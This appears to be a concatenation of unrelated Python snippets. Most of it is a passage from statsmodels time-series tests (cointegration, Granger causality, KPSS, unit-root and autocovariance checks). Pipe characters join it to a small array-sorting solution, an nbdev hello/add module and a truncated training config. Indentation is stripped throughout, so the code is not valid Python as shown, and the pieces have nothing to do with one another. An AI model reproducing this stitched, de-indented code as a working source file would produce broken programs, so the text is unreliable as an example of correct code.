cls.teststat = -1.830170986148
def test_coint():
nobs = 200
scale_e = 1
const = [1, 0, 0.5, 0]
np.random.seed(123)
unit = np.random.randn(nobs).cumsum()
y = scale_e * np.random.randn(nobs, 4)
y[:, :2] += unit[:, None]
y += const
y = np.round(y, 4)
# FIXME: enable/xfail/skip or delete
for trend in []: # ['c', 'ct', 'ctt', 'n']:
print("\n", trend)
print(coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None))
print(coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None))
# results from Stata egranger
res_egranger = {}
# trend = 'ct'
res = res_egranger["ct"] = {}
res[0] = [
-5.615251442239,
-4.406102369132,
-3.82866685109,
-3.532082997903,
]
res[1] = [
-5.63591313706,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[2] = [
-2.892029275027,
-4.758609717199,
-4.179130554708,
-3.880909696863,
]
res[3] = [-5.626932544079, -5.08363327039, -4.502469783057, -4.2031051091]
# trend = 'c'
res = res_egranger["c"] = {}
# first critical value res[0][1] has a discrepancy starting at 4th decimal
res[0] = [
-5.760696844656,
-3.952043522638,
-3.367006313729,
-3.065831247948,
]
# manually adjusted to have higher precision as in other cases
res[0][1] = -3.952321293401682
res[1] = [
-5.781087068772,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[2] = [
-2.477444137366,
-4.367111915942,
-3.783961136005,
-3.483501524709,
]
res[3] = [
-5.778205811661,
-4.735249216434,
-4.152738973763,
-3.852480848968,
]
# trend = 'ctt'
res = res_egranger["ctt"] = {}
res[0] = [
-5.644431269946,
-4.796038299708,
-4.221469431008,
-3.926472577178,
]
res[1] = [-5.665691609506, -5.111158174219, -4.53317278104, -4.23601008516]
res[2] = [-3.161462374828, -5.111158174219, -4.53317278104, -4.23601008516]
res[3] = [
-5.657904558563,
-5.406880189412,
-4.826111619543,
-4.527090164875,
]
# The following for 'n' are only regression test numbers
# trend = 'n' not allowed in egranger
# trend = 'n'
res = res_egranger["n"] = {}
nan = np.nan # shortcut for table
res[0] = [-3.7146175989071137, nan, nan, nan]
res[1] = [-3.8199323012888384, nan, nan, nan]
res[2] = [-1.6865000791270679, nan, nan, nan]
res[3] = [-3.7991270451873675, nan, nan, nan]
with pytest.warns(FutureWarning):
# Ensure warning raised for nc rather than n
coint(y[:, 0], y[:, 1], trend="nc", maxlag=4, autolag=None)
for trend in ["c", "ct", "ctt", "n"]:
res1 = {}
res1[0] = coint(y[:, 0], y[:, 1], trend=trend, maxlag=4, autolag=None)
res1[1] = coint(
y[:, 0], y[:, 1:3], trend=trend, maxlag=4, autolag=None
)
res1[2] = coint(y[:, 0], y[:, 2:], trend=trend, maxlag=4, autolag=None)
res1[3] = coint(y[:, 0], y[:, 1:], trend=trend, maxlag=4, autolag=None)
for i in range(4):
res = res_egranger[trend]
assert_allclose(res1[i][0], res[i][0], rtol=1e-11)
r2 = res[i][1:]
r1 = res1[i][2]
assert_allclose(r1, r2, rtol=0, atol=6e-7)
# use default autolag #4490
res1_0 = coint(y[:, 0], y[:, 1], trend="ct", maxlag=4)
assert_allclose(res1_0[2], res_egranger["ct"][0][1:], rtol=0, atol=6e-7)
# the following is just a regression test
assert_allclose(
res1_0[:2],
[-13.992946638547112, 2.270898990540678e-27],
rtol=1e-10,
atol=1e-27,
)
def test_coint_identical_series():
nobs = 200
scale_e = 1
np.random.seed(123)
y = scale_e * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with pytest.warns(CollinearityWarning):
c = coint(y, y, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
def test_coint_perfect_collinearity():
# test uses nearly perfect collinearity
nobs = 200
scale_e = 1
np.random.seed(123)
x = scale_e * np.random.randn(nobs, 2)
y = 1 + x.sum(axis=1) + 1e-7 * np.random.randn(nobs)
warnings.simplefilter("always", CollinearityWarning)
with warnings.catch_warnings(record=True) as w:
c = coint(y, x, trend="c", maxlag=0, autolag=None)
assert_equal(c[1], 0.0)
assert_(np.isneginf(c[0]))
class TestGrangerCausality(object):
def test_grangercausality(self):
# some example data
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
# R: lmtest:grangertest
r_result = [0.243097, 0.7844328, 195, 2] # f_test
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
assert_almost_equal(r_result, gr[2][0]["ssr_ftest"], decimal=7)
assert_almost_equal(
gr[2][0]["params_ftest"], gr[2][0]["ssr_ftest"], decimal=7
)
def test_grangercausality_single(self):
mdata = macrodata.load_pandas().data
mdata = mdata[["realgdp", "realcons"]].values
data = mdata.astype(float)
data = np.diff(np.log(data), axis=0)
gr = grangercausalitytests(data[:, 1::-1], 2, verbose=False)
gr2 = grangercausalitytests(data[:, 1::-1], [2], verbose=False)
assert 1 in gr
assert 1 not in gr2
assert_almost_equal(
gr[2][0]["ssr_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
assert_almost_equal(
gr[2][0]["params_ftest"], gr2[2][0]["ssr_ftest"], decimal=7
)
def test_granger_fails_on_nobs_check(self, reset_randomstate):
# Test that if maxlag is too large, Granger Test raises a clear error.
x = np.random.rand(10, 2)
grangercausalitytests(x, 2, verbose=False) # This should pass.
with pytest.raises(ValueError):
grangercausalitytests(x, 3, verbose=False)
def test_granger_fails_on_finite_check(self, reset_randomstate):
x = np.random.rand(1000, 2)
x[500, 0] = np.nan
x[750, 1] = np.inf
with pytest.raises(ValueError, match="x contains NaN"):
grangercausalitytests(x, 2)
def test_granger_fails_on_zero_lag(self, reset_randomstate):
x = np.random.rand(1000, 2)
with pytest.raises(
ValueError,
match="maxlag must be a non-empty list containing only positive integers",
):
grangercausalitytests(x, [0, 1, 2])
class TestKPSS:
"""
R-code
------
library(tseries)
kpss.stat(x, "Level")
kpss.stat(x, "Trend")
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
def test_fail_nonvector_input(self, reset_randomstate):
# should be fine
with pytest.warns(InterpolationWarning):
kpss(self.x, nlags="legacy")
x = np.random.rand(20, 2)
assert_raises(ValueError, kpss, x)
def test_fail_unclear_hypothesis(self):
# these should be fine,
with pytest.warns(InterpolationWarning):
kpss(self.x, "c", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "C", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "ct", nlags="legacy")
with pytest.warns(InterpolationWarning):
kpss(self.x, "CT", nlags="legacy")
assert_raises(
ValueError, kpss, self.x, "unclear hypothesis", nlags="legacy"
)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "c", 3)
assert_almost_equal(kpss_stat, 5.0169, DECIMAL_3)
with pytest.warns(InterpolationWarning):
kpss_stat, _, _, _ = kpss(self.x, "ct", 3)
assert_almost_equal(kpss_stat, 1.1828, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "c", 3)
assert_equal(pval, 0.01)
with pytest.warns(InterpolationWarning):
_, pval, _, _ = kpss(self.x, "ct", 3)
assert_equal(pval, 0.01)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = kpss(self.x, "c", 3, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
assert_equal(store.lags, 3)
# test autolag function _kpss_autolag against SAS 9.3
def test_lags(self):
# real GDP from macrodata data set
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="auto")
assert_equal(res[2], 9)
# real interest rates from macrodata data set
res = kpss(sunspots.load().data["SUNACTIVITY"], "c", nlags="auto")
assert_equal(res[2], 7)
# volumes from nile data set
with pytest.warns(InterpolationWarning):
res = kpss(nile.load().data["volume"], "c", nlags="auto")
assert_equal(res[2], 5)
# log-coinsurance from randhie data set
with pytest.warns(InterpolationWarning):
res = kpss(randhie.load().data["lncoins"], "ct", nlags="auto")
assert_equal(res[2], 75)
# in-vehicle time from modechoice data set
with pytest.warns(InterpolationWarning):
res = kpss(modechoice.load().data["invt"], "ct", nlags="auto")
assert_equal(res[2], 18)
def test_kpss_fails_on_nobs_check(self):
# Test that if lags exceeds number of observations KPSS raises a
# clear error
# GH5925
nobs = len(self.x)
msg = r"lags \({}\) must be < number of observations \({}\)".format(
nobs, nobs
)
with pytest.raises(ValueError, match=msg):
kpss(self.x, "c", nlags=nobs)
def test_kpss_autolags_does_not_assign_lags_equal_to_nobs(self):
# Test that if *autolags* exceeds number of observations, we set
# suitable lags
# GH5925
base = np.array([0, 0, 0, 0, 0, 1, 1.0])
data_which_breaks_autolag = np.r_[np.tile(base, 297 // 7), [0, 0, 0]]
kpss(data_which_breaks_autolag, nlags="auto")
def test_legacy_lags(self):
# Test legacy lags are the same
with pytest.warns(InterpolationWarning):
res = kpss(self.x, "c", nlags="legacy")
assert_equal(res[2], 15)
def test_unknown_lags(self):
# Test legacy lags are the same
with pytest.raises(ValueError):
kpss(self.x, "c", nlags="unknown")
def test_none(self):
with pytest.warns(FutureWarning):
kpss(self.x, nlags=None)
class TestRUR:
"""
Simple implementation
------
Since an R implementation of the test cannot be found, the method is tested against
a simple implementation using a for loop.
In this context, x is the vector containing the
macrodata['realgdp'] series.
"""
@classmethod
def setup(cls):
cls.data = macrodata.load_pandas()
cls.x = cls.data.data["realgdp"].values
# To be removed when range unit test gets an R implementation
def simple_rur(self, x, store=False):
x = array_like(x, "x")
store = bool_like(store, "store")
nobs = x.shape[0]
# if m is not one, n != m * n
if nobs != x.size:
raise ValueError("x of shape {0} not understood".format(x.shape))
# Table from [1] has been replicated using 200,000 samples
# Critical values for new n_obs values have been identified
pvals = [0.01, 0.025, 0.05, 0.10, 0.90, 0.95]
n = np.array(
[25, 50, 100, 150, 200, 250, 500, 1000, 2000, 3000, 4000, 5000]
)
crit = np.array(
[
[0.6626, 0.8126, 0.9192, 1.0712, 2.4863, 2.7312],
[0.7977, 0.9274, 1.0478, 1.1964, 2.6821, 2.9613],
[0.907, 1.0243, 1.1412, 1.2888, 2.8317, 3.1393],
[0.9543, 1.0768, 1.1869, 1.3294, 2.8915, 3.2049],
[0.9833, 1.0984, 1.2101, 1.3494, 2.9308, 3.2482],
[0.9982, 1.1137, 1.2242, 1.3632, 2.9571, 3.2482],
[1.0494, 1.1643, 1.2712, 1.4076, 3.0207, 3.3584],
[1.0846, 1.1959, 1.2988, 1.4344, 3.0653, 3.4073],
[1.1121, 1.2200, 1.3230, 1.4556, 3.0948, 3.4439],
[1.1204, 1.2295, 1.3318, 1.4656, 3.1054, 3.4632],
[1.1309, 1.2347, 1.3318, 1.4693, 3.1165, 3.4717],
[1.1377, 1.2402, 1.3408, 1.4729, 3.1252, 3.4807],
]
)
# Interpolation for nobs
inter_crit = np.zeros((1, crit.shape[1]))
for i in range(crit.shape[1]):
f = interp1d(n, crit[:, i])
inter_crit[0, i] = f(nobs)
# Calculate RUR stat
count = 0
max_p = x[0]
min_p = x[0]
for v in x[1:]:
if v > max_p:
max_p = v
count = count + 1
if v < min_p:
min_p = v
count = count + 1
rur_stat = count / np.sqrt(len(x))
k = len(pvals) - 1
for i in range(len(pvals) - 1, -1, -1):
if rur_stat < inter_crit[0, i]:
k = i
else:
break
p_value = pvals[k]
warn_msg = """\
The test statistic is outside of the range of p-values available in the
look-up table. The actual p-value is {direction} than the p-value returned.
"""
direction = ""
if p_value == pvals[-1]:
direction = "smaller"
elif p_value == pvals[0]:
direction = "larger"
if direction:
warnings.warn(
warn_msg.format(direction=direction), InterpolationWarning
)
crit_dict = {
"10%": inter_crit[0, 3],
"5%": inter_crit[0, 2],
"2.5%": inter_crit[0, 1],
"1%": inter_crit[0, 0],
}
if store:
from statsmodels.stats.diagnostic import ResultsStore
rstore = ResultsStore()
rstore.nobs = nobs
rstore.H0 = "The series is not stationary"
rstore.HA = "The series is stationary"
return rur_stat, p_value, crit_dict, rstore
else:
return rur_stat, p_value, crit_dict
def test_fail_nonvector_input(self, reset_randomstate):
with pytest.warns(InterpolationWarning):
range_unit_root_test(self.x)
x = np.random.rand(20, 2)
assert_raises(ValueError, range_unit_root_test, x)
def test_teststat(self):
with pytest.warns(InterpolationWarning):
rur_stat, _, _ = range_unit_root_test(self.x)
simple_rur_stat, _, _ = self.simple_rur(self.x)
assert_almost_equal(rur_stat, simple_rur_stat, DECIMAL_3)
def test_pval(self):
with pytest.warns(InterpolationWarning):
_, pval, _ = range_unit_root_test(self.x)
_, simple_pval, _ = self.simple_rur(self.x)
assert_equal(pval, simple_pval)
def test_store(self):
with pytest.warns(InterpolationWarning):
_, _, _, store = range_unit_root_test(self.x, True)
# assert attributes, and make sure they're correct
assert_equal(store.nobs, len(self.x))
def test_pandasacovf():
s = Series(lrange(1, 11))
assert_almost_equal(acovf(s, fft=False), acovf(s.values, fft=False))
def test_acovf2d(reset_randomstate):
dta = sunspots.load_pandas().data
dta.index = date_range(start="1700", end="2009", freq="A")[:309]
del dta["YEAR"]
res = acovf(dta, fft=False)
assert_equal(res, acovf(dta.values, fft=False))
x = np.random.random((10, 2))
with pytest.raises(ValueError):
acovf(x, fft=False)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
q = np.random.normal(size=100)
F1 = acovf(q, demean=demean, adjusted=adjusted, fft=True)
F2 = acovf(q, demean=demean, adjusted=adjusted, fft=False)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_ccovf_fft_vs_convolution(demean, adjusted, reset_randomstate):
x = np.random.normal(size=128)
y = np.random.normal(size=128)
F1 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=False)
F2 = ccovf(x, y, demean=demean, adjusted=adjusted, fft=True)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
@pytest.mark.parametrize("fft", [True, False])
def test_compare_acovf_vs_ccovf(demean, adjusted, fft, reset_randomstate):
x = np.random.normal(size=128)
F1 = acovf(x, demean=demean, adjusted=adjusted, fft=fft)
F2 = ccovf(x, x, demean=demean, adjusted=adjusted, fft=fft)
assert_almost_equal(F1, F2, decimal=7)
@pytest.mark.smoke
@pytest.mark.slow
def test_arma_order_select_ic():
# smoke test, assumes info-criteria are right
from statsmodels.tsa.arima_process import arma_generate_sample
arparams = np.array([0.75, -0.25])
maparams = np.array([0.65, 0.35])
arparams = np.r_[1, -arparams]
maparam = np.r_[1, maparams] # FIXME: Never used
nobs = 250
np.random.seed(2014)
y = arma_generate_sample(arparams, maparams, nobs)
res = arma_order_select_ic(y, ic=["aic", "bic"], trend="n")
# regression tests in case we change algorithm to minic in sas
aic_x = np.array(
[
[764.36517643, 552.7342255, 484.29687843],
[562.10924262, 485.5197969, 480.32858497],
[507.04581344, 482.91065829, 481.91926034],
[484.03995962, 482.14868032, 483.86378955],
[481.8849479, 483.8377379, 485.83756612],
]
)
bic_x = np.array(
[
[767.88663735, 559.77714733, 494.86126118],
[569.15216446, 496.08417966, 494.41442864],
[517.61019619, 496.99650196, 499.52656493],
[498.12580329, 499.75598491, 504.99255506],
[499.49225249, 504.96650341, 510.48779255],
]
)
aic = DataFrame(aic_x, index=lrange(5), columns=lrange(3))
bic = DataFrame(bic_x, index=lrange(5), columns=lrange(3))
assert_almost_equal(res.aic.values, aic.values, 5)
assert_almost_equal(res.bic.values, bic.values, 5)
assert_equal(res.aic_min_order, (1, 2))
assert_equal(res.bic_min_order, (1, 2))
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_(res.bic.index.equals(bic.index))
assert_(res.bic.columns.equals(bic.columns))
index = pd.date_range("2000-1-1", freq="M", periods=len(y))
y_series = pd.Series(y, index=index)
res_pd = arma_order_select_ic(
y_series, max_ar=2, max_ma=1, ic=["aic", "bic"], trend="n"
)
assert_almost_equal(res_pd.aic.values, aic.values[:3, :2], 5)
assert_almost_equal(res_pd.bic.values, bic.values[:3, :2], 5)
assert_equal(res_pd.aic_min_order, (2, 1))
assert_equal(res_pd.bic_min_order, (1, 1))
res = arma_order_select_ic(y, ic="aic", trend="n")
assert_almost_equal(res.aic.values, aic.values, 5)
assert_(res.aic.index.equals(aic.index))
assert_(res.aic.columns.equals(aic.columns))
assert_equal(res.aic_min_order, (1, 2))
def test_arma_order_select_ic_failure():
# this should trigger an SVD convergence failure, smoke test that it
# returns, likely platform dependent failure...
# looks like AR roots may be cancelling out for 4, 1?
y = np.array(
[
0.86074377817203640006,
0.85316549067906921611,
0.87104653774363305363,
0.60692382068987393851,
0.69225941967301307667,
0.73336177248909339976,
0.03661329261479619179,
0.15693067239962379955,
0.12777403512447857437,
-0.27531446294481976,
-0.24198139631653581283,
-0.23903317951236391359,
-0.26000241325906497947,
-0.21282920015519238288,
-0.15943768324388354896,
0.25169301564268781179,
0.1762305709151877342,
0.12678133368791388857,
0.89755829086753169399,
0.82667068795350151511,
]
)
import warnings
with warnings.catch_warnings():
# catch a hessian inversion and convergence failure warning
warnings.simplefilter("ignore")
res = arma_order_select_ic(y)
def test_acf_fft_dataframe():
# regression test #322
result = acf(
sunspots.load_pandas().data[["SUNACTIVITY"]], fft=True, nlags=20
)
assert_equal(result.ndim, 1)
def test_levinson_durbin_acov():
rho = 0.9
m = 20
acov = rho ** np.arange(200)
sigma2_eps, ar, pacf, _, _ = levinson_durbin(acov, m, isacov=True)
assert_allclose(sigma2_eps, 1 - rho ** 2)
assert_allclose(ar, np.array([rho] + [0] * (m - 1)), atol=1e-8)
assert_allclose(pacf, np.array([1, rho] + [0] * (m - 1)), atol=1e-8)
@pytest.mark.parametrize("missing", ["conservative", "drop", "raise", "none"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags(acovf_data, adjusted, demean, fft, missing):
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
@pytest.mark.parametrize("missing", ["conservative", "drop"])
@pytest.mark.parametrize("fft", [False, True])
@pytest.mark.parametrize("demean", [True, False])
@pytest.mark.parametrize("adjusted", [True, False])
def test_acovf_nlags_missing(acovf_data, adjusted, demean, fft, missing):
acovf_data = acovf_data.copy()
acovf_data[1:3] = np.nan
full = acovf(
acovf_data, adjusted=adjusted, demean=demean, fft=fft, missing=missing
)
limited = acovf(
acovf_data,
adjusted=adjusted,
demean=demean,
fft=fft,
missing=missing,
nlag=10,
)
assert_allclose(full[:11], limited)
def test_acovf_error(acovf_data):
with pytest.raises(ValueError):
acovf(acovf_data, nlag=250, fft=False)
def test_pacf2acf_ar():
pacf = np.zeros(10)
pacf[0] = 1
pacf[1] = 0.9
ar, acf = levinson_durbin_pacf(pacf)
assert_allclose(acf, 0.9 ** np.arange(10.0))
assert_allclose(ar, pacf[1:], atol=1e-8)
ar, acf = levinson_durbin_pacf(pacf, nlags=5)
assert_allclose(acf, 0.9 ** np.arange(6.0))
assert_allclose(ar, pacf[1:6], atol=1e-8)
def test_pacf2acf_levinson_durbin():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
ar, acf = levinson_durbin_pacf(pacf)
_, ar_ld, pacf_ld, _, _ = levinson_durbin(acf, 10, isacov=True)
assert_allclose(ar, ar_ld, atol=1e-8)
assert_allclose(pacf, pacf_ld, atol=1e-8)
# From R, FitAR, PacfToAR
ar_from_r = [
-4.1609,
-9.2549,
-14.4826,
-17.6505,
-17.5012,
-14.2969,
-9.5020,
-4.9184,
-1.7911,
-0.3486,
]
assert_allclose(ar, ar_from_r, atol=1e-4)
def test_pacf2acf_errors():
pacf = -(0.9 ** np.arange(11.0))
pacf[0] = 1
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf, nlags=20)
with pytest.raises(ValueError):
levinson_durbin_pacf(pacf[1:])
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros(10))
with pytest.raises(ValueError):
levinson_durbin_pacf(np.zeros((10, 2)))
def test_pacf_burg():
rnd = np.random.RandomState(12345)
e = rnd.randn(10001)
y = e[1:] + 0.5 * e[:-1]
pacf, sigma2 = pacf_burg(y, 10)
yw_pacf = pacf_yw(y, 10)
assert_allclose(pacf, yw_pacf, atol=5e-4)
# Internal consistency check between pacf and sigma2
ye = y - y.mean()
s2y = ye.dot(ye) / 10000
pacf[0] = 0
sigma2_direct = s2y * np.cumprod(1 - pacf ** 2)
assert_allclose(sigma2, sigma2_direct, atol=1e-3)
def test_pacf_burg_error():
with pytest.raises(ValueError):
pacf_burg(np.empty((20, 2)), 10)
with pytest.raises(ValueError):
pacf_burg(np.empty(100), 101)
def test_innovations_algo_brockwell_davis():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, sigma2 = innovations_algo(acovf, nobs=4)
exp_theta = np.array([[0], [-0.4972], [-0.6606], [-0.7404]])
assert_allclose(theta, exp_theta, rtol=1e-4)
assert_allclose(sigma2, [1.81, 1.3625, 1.2155, 1.1436], rtol=1e-4)
theta, sigma2 = innovations_algo(acovf, nobs=500)
assert_allclose(theta[-1, 0], ma)
assert_allclose(sigma2[-1], 1.0)
def test_innovations_algo_rtol():
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, sigma2 = innovations_algo(acovf, nobs=500)
theta_2, sigma2_2 = innovations_algo(acovf, nobs=500, rtol=1e-8)
assert_allclose(theta, theta_2)
assert_allclose(sigma2, sigma2_2)
def test_innovations_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
with pytest.raises(TypeError):
innovations_algo(acovf, nobs=2.2)
with pytest.raises(ValueError):
innovations_algo(acovf, nobs=-1)
with pytest.raises(ValueError):
innovations_algo(np.empty((2, 2)))
with pytest.raises(TypeError):
innovations_algo(acovf, rtol="none")
def test_innovations_filter_brockwell_davis(reset_randomstate):
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
e = np.random.randn(5)
endog = e[1:] + ma * e[:-1]
resid = innovations_filter(endog, theta)
expected = [endog[0]]
for i in range(1, 4):
expected.append(endog[i] - theta[i, 0] * expected[-1])
expected = np.array(expected)
assert_allclose(resid, expected)
def test_innovations_filter_pandas(reset_randomstate):
ma = np.array([-0.9, 0.5])
acovf = np.array([1 + (ma ** 2).sum(), ma[0] + ma[1] * ma[0], ma[1]])
theta, _ = innovations_algo(acovf, nobs=10)
endog = np.random.randn(10)
endog_pd = pd.Series(endog, index=pd.date_range("2000-01-01", periods=10))
resid = innovations_filter(endog, theta)
resid_pd = innovations_filter(endog_pd, theta)
assert_allclose(resid, resid_pd.values)
assert_index_equal(endog_pd.index, resid_pd.index)
def test_innovations_filter_errors():
ma = -0.9
acovf = np.array([1 + ma ** 2, ma])
theta, _ = innovations_algo(acovf, nobs=4)
with pytest.raises(ValueError):
innovations_filter(np.empty((2, 2)), theta)
with pytest.raises(ValueError):
innovations_filter(np.empty(4), theta[:-1])
with pytest.raises(ValueError):
innovations_filter(pd.DataFrame(np.empty((1, 4))), theta)
def test_innovations_algo_filter_kalman_filter(reset_randomstate):
# Test the innovations algorithm and filter against the Kalman filter
# for exact likelihood evaluation of an ARMA process
ar_params = np.array([0.5])
ma_params = np.array([0.2])
# TODO could generalize to sigma2 != 1, if desired, after #5324 is merged
# and there is a sigma2 argument to arma_acovf
# (but maybe this is not really necessary for the point of this test)
sigma2 = 1
endog = np.random.normal(size=10)
# Innovations algorithm approach
acovf = arma_acovf(
np.r_[1, -ar_params], np.r_[1, ma_params], nobs=len(endog)
)
theta, v = innovations_algo(acovf)
u = innovations_filter(endog, theta)
llf_obs = -0.5 * u ** 2 / (sigma2 * v) - 0.5 * np.log(2 * np.pi * v)
# Kalman filter apparoach
mod = SARIMAX(endog, order=(len(ar_params), 0, len(ma_params)))
res = mod.filter(np.r_[ar_params, ma_params, sigma2])
# Test that the two approaches are identical
atol = 1e-6 if PLATFORM_WIN else 0.0
assert_allclose(u, res.forecasts_error[0], rtol=1e-6, atol=atol)
assert_allclose(
theta[1:, 0], res.filter_results.kalman_gain[0, 0, :-1], atol=atol
)
assert_allclose(llf_obs, res.llf_obs, atol=atol)
def test_adfuller_short_series(reset_randomstate):
y = np.random.standard_normal(7)
res = adfuller(y, store=True)
assert res[-1].maxlag == 1
y = np.random.standard_normal(2)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y)
y = np.random.standard_normal(3)
with pytest.raises(ValueError, match="sample size is too short"):
adfuller(y, regression="ct")
def test_adfuller_maxlag_too_large(reset_randomstate):
y = np.random.standard_normal(100)
with pytest.raises(ValueError, match="maxlag must be less than"):
adfuller(y, maxlag=51)
class SetupZivotAndrews(object):
# test directory
cur_dir = CURR_DIR
run_dir = os.path.join(cur_dir, "results")
# use same file for testing failure modes
fail_file = os.path.join(run_dir, "rgnp.csv")
fail_mdl = np.asarray(pd.read_csv(fail_file))
class TestZivotAndrews(SetupZivotAndrews):
# failure mode tests
def test_fail_regression_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, regression="x")
def test_fail_trim_value(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, trim=0.5)
def test_fail_array_shape(self):
with pytest.raises(ValueError):
zivot_andrews(np.random.rand(50, 2))
def test_fail_autolag_type(self):
with pytest.raises(ValueError):
zivot_andrews(self.fail_mdl, autolag="None")
@pytest.mark.parametrize("autolag", ["AIC", "aic", "Aic"])
def test_autolag_case_sensitivity(self, autolag):
res = zivot_andrews(self.fail_mdl, autolag=autolag)
assert res[3] == 1
# following tests compare results to R package urca.ur.za (1.13-0)
def test_rgnp_case(self):
res = zivot_andrews(
self.fail_mdl, maxlag=8, regression="c", autolag=None
)
assert_allclose(
[res[0], res[1], res[4]], [-5.57615, 0.00312, 20], rtol=1e-3
)
def test_gnpdef_case(self):
mdlfile = os.path.join(self.run_dir, "gnpdef.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-4.12155, 0.28024, 5, 40],
rtol=1e-3,
)
def test_stkprc_case(self):
mdlfile = os.path.join(self.run_dir, "stkprc.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=8, regression="ct", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-5.60689, 0.00894, 1, 65],
rtol=1e-3,
)
def test_rgnpq_case(self):
mdlfile = os.path.join(self.run_dir, "rgnpq.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, maxlag=12, regression="t", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.02761, 0.63993, 12, 102],
rtol=1e-3,
)
def test_rand10000_case(self):
mdlfile = os.path.join(self.run_dir, "rand10000.csv")
mdl = np.asarray(pd.read_csv(mdlfile))
res = zivot_andrews(mdl, regression="c", autolag="t-stat")
assert_allclose(
[res[0], res[1], res[3], res[4]],
[-3.48223, 0.69111, 25, 7071],
rtol=1e-3,
)
def test_acf_conservate_nanops(reset_randomstate):
# GH 6729
e = np.random.standard_normal(100)
for i in range(1, e.shape[0]):
e[i] += 0.9 * e[i - 1]
e[::7] = np.nan
result = acf(e, missing="conservative", nlags=10, fft=False)
resid = e - np.nanmean(e)
expected = np.ones(11)
nobs = e.shape[0]
gamma0 = np.nansum(resid * resid)
for i in range(1, 10 + 1):
expected[i] = np.nansum(resid[i:] * resid[: nobs - i]) / gamma0
assert_allclose(result, expected, rtol=1e-4, atol=1e-4)
def test_pacf_nlags_error(reset_randomstate):
e = np.random.standard_normal(100)
with pytest.raises(ValueError, match="Can only compute partial"):
pacf(e, 50)
def test_coint_auto_tstat():
rs = np.random.RandomState(3733696641)
x = np.cumsum(rs.standard_normal(100))
y = np.cumsum(rs.standard_normal(100))
res = coint(
x,
y,
trend="c",
method="aeg",
maxlag=0,
autolag="t-stat",
return_results=False,
)
assert np.abs(res[0]) < 1.65
rs = np.random.RandomState(1)
a = rs.random_sample(120)
b = np.zeros_like(a)
df1 = pd.DataFrame({"b": b, "a": a})
df2 = pd.DataFrame({"a": a, "b": b})
b = np.ones_like(a)
df3 = pd.DataFrame({"b": b, "a": a})
df4 = pd.DataFrame({"a": a, "b": b})
gc_data_sets = [df1, df2, df3, df4]
@pytest.mark.parametrize("dataset", gc_data_sets)
def test_granger_causality_exceptions(dataset):
with pytest.raises(InfeasibleTestError):
grangercausalitytests(dataset, 4)
|
class Solution:
def sortArrayByParity(self, A):
"""
:type A: List[int]
:rtype: List[int]
"""
even = [x for x in A if x%2 == 0 ]
odd = [x for x in A if x%2 != 0 ]
return even + odd
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['say_hello', 'add']
# Cell
def say_hello(to):
"""Say hello to somebody!"""
return f'Hello {to}!'
# Cell
def add(a, b):
"""adding two numbers"""
return a+b |
# Author': a101269
# Date ': 2020/3/4
configs={
'use_cuda':True,
'seed': 123,
'epochs':30,
'eval_interval':500,
